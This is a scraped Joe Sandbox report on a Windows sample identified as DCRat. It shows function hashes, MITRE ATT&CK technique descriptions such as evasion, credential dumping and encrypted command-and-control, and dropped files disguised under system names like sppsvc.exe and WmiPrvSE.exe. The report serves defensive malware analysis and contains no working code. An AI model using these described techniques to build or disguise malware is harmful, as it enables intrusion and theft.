Opcode ID: d48a3cd90d7d6539c8c9f217ef975dab9ef77c8d2e408d30a97d0daffcfc6f98
Instruction ID: c09028904c014c45031d04913ed9e4c03af153547df6e1e5436c9648cfd90ee4
Opcode Fuzzy Hash: d48a3cd90d7d6539c8c9f217ef975dab9ef77c8d2e408d30a97d0daffcfc6f98
Instruction Fuzzy Hash: 04D0C910A0C7D38DF6787E01E1B0A3A55A05F483A1E60003EC05F418C1CD1CB901E30A

Function 00007FF848F70EB2 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F65000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F65000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f65000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b5dedbdb92eae5c997ee8ed33e420fc547df883013967f9a5c7b6a37260c918
Instruction ID: 0936b32c5ed4e06fce0f6bda5f3886bfdb511644603b730b9afd32047d8d0f66
Opcode Fuzzy Hash: 2b5dedbdb92eae5c997ee8ed33e420fc547df883013967f9a5c7b6a37260c918
Instruction Fuzzy Hash: DFD0E974D0D95CCEEB69DF88D4447D976B4FB58355F1011AAD40DF2280D7351A908B04

Function 00007FF8494A72C8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c773af2f0da965bfa6e38ca935fd97f524c6fdd73c067d4d79dfa3de5e6861d9
Instruction ID: 686531742207777dfcfcf45a01f5a8a291853f4679dfeb9230f552d02924b917
Opcode Fuzzy Hash: c773af2f0da965bfa6e38ca935fd97f524c6fdd73c067d4d79dfa3de5e6861d9
Instruction Fuzzy Hash: ECC09B21D4D6478EF970395540111FC53C19F957F07610535D05EC2183DC4C644750A5

Function 00007FF8494A53D4 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9131003df5fad4a706316b4538b87d8ebb4b19067db7cbbb09d562b755a65a9
Instruction ID: 4514d8000a0c588fa0acbaeb4e6e975ce336602a67fec885380635f5f8dd29c1
Opcode Fuzzy Hash: e9131003df5fad4a706316b4538b87d8ebb4b19067db7cbbb09d562b755a65a9
Instruction Fuzzy Hash: E8C0121291D3C6CEDB356E1495507BD2F405F61284F100176C445460C3C958A606D31A

Function 00007FF8494A119F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 599f80b69526991524a935bce1cace33197e62b690ade6d4382e76f67fc5c8f1
Instruction ID: d7716d666ff7ad6f5209630041b304d8d6c4008ccacbbfd41a7001816f79b2a8
Opcode Fuzzy Hash: 599f80b69526991524a935bce1cace33197e62b690ade6d4382e76f67fc5c8f1
Instruction Fuzzy Hash: 57C09B41E0D3C39FFB313D70549187C16510F7E2907950672D107461C3EC9C7D559359

Function 00007FF8494A1391 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b69a951715564adde37699c881ea05f2e8834a1eb5d89231968b12fc06390d0a
Instruction ID: fc3c24f6630b3ece3dc2e9f71503e88440beee5dcc627dd877b568e76d86cea0
Opcode Fuzzy Hash: b69a951715564adde37699c881ea05f2e8834a1eb5d89231968b12fc06390d0a
Instruction Fuzzy Hash: 96A00210E0CAAA9DE5717914544197E00419FDC690A258071D00E8128ACD5CAB52524B

Non-executed Functions

Function 00007FF8494B0C28 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58bc528c71a1f981817db3447a291baea45caa98ba45403e8c23edf55f29d3fb
Instruction ID: 8dd431b17c175157adc6841f8e728444cb6c1a9250cfd2527dcc5a24e1b5a2c0
Opcode Fuzzy Hash: 58bc528c71a1f981817db3447a291baea45caa98ba45403e8c23edf55f29d3fb
Instruction Fuzzy Hash: 1771E532D0DBD94FEB69EF68E8646E9BBF0FF66311F1440ABC048C7196DA249845C780

Function 00007FF848F4172E Relevance: .3, Instructions: 252COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f3d000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc6943a58fcc79438e8467d9d802603f9df74215f6c0f94a0141f598d0c9e293
Instruction ID: 1f28147febbffc9c3c1933f775743a0f687aeb4fa90d2fb05c2d829cc0c45c3f
Opcode Fuzzy Hash: bc6943a58fcc79438e8467d9d802603f9df74215f6c0f94a0141f598d0c9e293
Instruction Fuzzy Hash: 6381A57090CA8D8FEBA8EF28C8457E97BE0FF69350F10416AE84DC7291DB749485CB85

Function 00007FF8494AAE46 Relevance: 5.2, Strings: 4, Instructions: 191COMMON

Download Yara Rule

Strings

84<I, xrefs: 00007FF8494AAE7B
84<I, xrefs: 00007FF8494AAF09
84<I, xrefs: 00007FF8494AAE5F
84<I, xrefs: 00007FF8494AAF83

Memory Dump Source

Source File: 00000020.00000002.3557404980.00007FF8494A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8494A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff8494a0000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: 84<I$84<I$84<I$84<I
API String ID: 0-3944666985
Opcode ID: c8f67206da7a57752e56e5baaa97599ef1e3f1bf496a65b3b4188cf867043870
Instruction ID: f221ccd29f28f126137b4cdd142dfcca84e428e85f855b855c624f2d55c803b8
Opcode Fuzzy Hash: c8f67206da7a57752e56e5baaa97599ef1e3f1bf496a65b3b4188cf867043870
Instruction Fuzzy Hash: 1F514B31608D189FDF88FF28C098EA673E1FBB830571441A9D00EC76A6DE24ED85CB81

Function 00007FF848F7FA7F Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

, xrefs: 00007FF848F7F168
E, xrefs: 00007FF848F7F13D
,, xrefs: 00007FF848F7FAB4
w, xrefs: 00007FF848F7FA89

Memory Dump Source

Source File: 00000020.00000002.3528666210.00007FF848F79000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F79000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_7ff848f79000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: $,$E$w
API String ID: 0-2891256252
Opcode ID: 0c765f8d658abb34a55e1c78647be2e9df2ab9f2a4e9b0a5d5614b97c470573c
Instruction ID: ef8e12847f4afb2c01da3acf510b094350c3e10a09d370630fecd98d907f7e99
Opcode Fuzzy Hash: 0c765f8d658abb34a55e1c78647be2e9df2ab9f2a4e9b0a5d5614b97c470573c
Instruction Fuzzy Hash: 6731E871D08A1A8FEBA8EF08C854BA8B7B1FB54345F0440FEC40DA3291CB792A81CF45

Analysis Process: DtJTopEKFGnyRQt.exePID: 6412, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	0

Executed Functions

Function 00007FF848F3ADFD Relevance: 4.3, Strings: 1, Instructions: 3030COMMON

Download Yara Rule

Strings

rL_H, xrefs: 00007FF848F3B273

Memory Dump Source

Source File: 00000021.00000002.2727178225.00007FF848F3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F3A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f3a000_DtJTopEKFGnyRQt.jbxd

Similarity

API ID:
String ID: rL_H
API String ID: 0-3705031574
Opcode ID: 682e84620eef736cb0ac3a0ec3e97c1a5d741ae2e30cdf9304de3116ef35280b
Instruction ID: 86beb9d5b2e710db99292efac457f9ba264d41b177bf774323ee93f2e1fa7db3
Opcode Fuzzy Hash: 682e84620eef736cb0ac3a0ec3e97c1a5d741ae2e30cdf9304de3116ef35280b
Instruction Fuzzy Hash: 10430C70D199298FDB99EB18C895BA9B7B1FF58341F1441EAC00DE3296CB386E81CF45

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\MsContainer\0a1fd5f707cd16

C:\MsContainer\chainportruntimeCrtMonitor.exe

C:\MsContainer\iceJ1UmfnosxAG3hkAOO7zmCT1vAJ8icZlmWEOQE.vbe

C:\MsContainer\sppsvc.exe

C:\MsContainer\zXrLq55h.bat

C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\24dbde2999530e

C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\WmiPrvSE.exe

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Windows Analysis Report
file.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre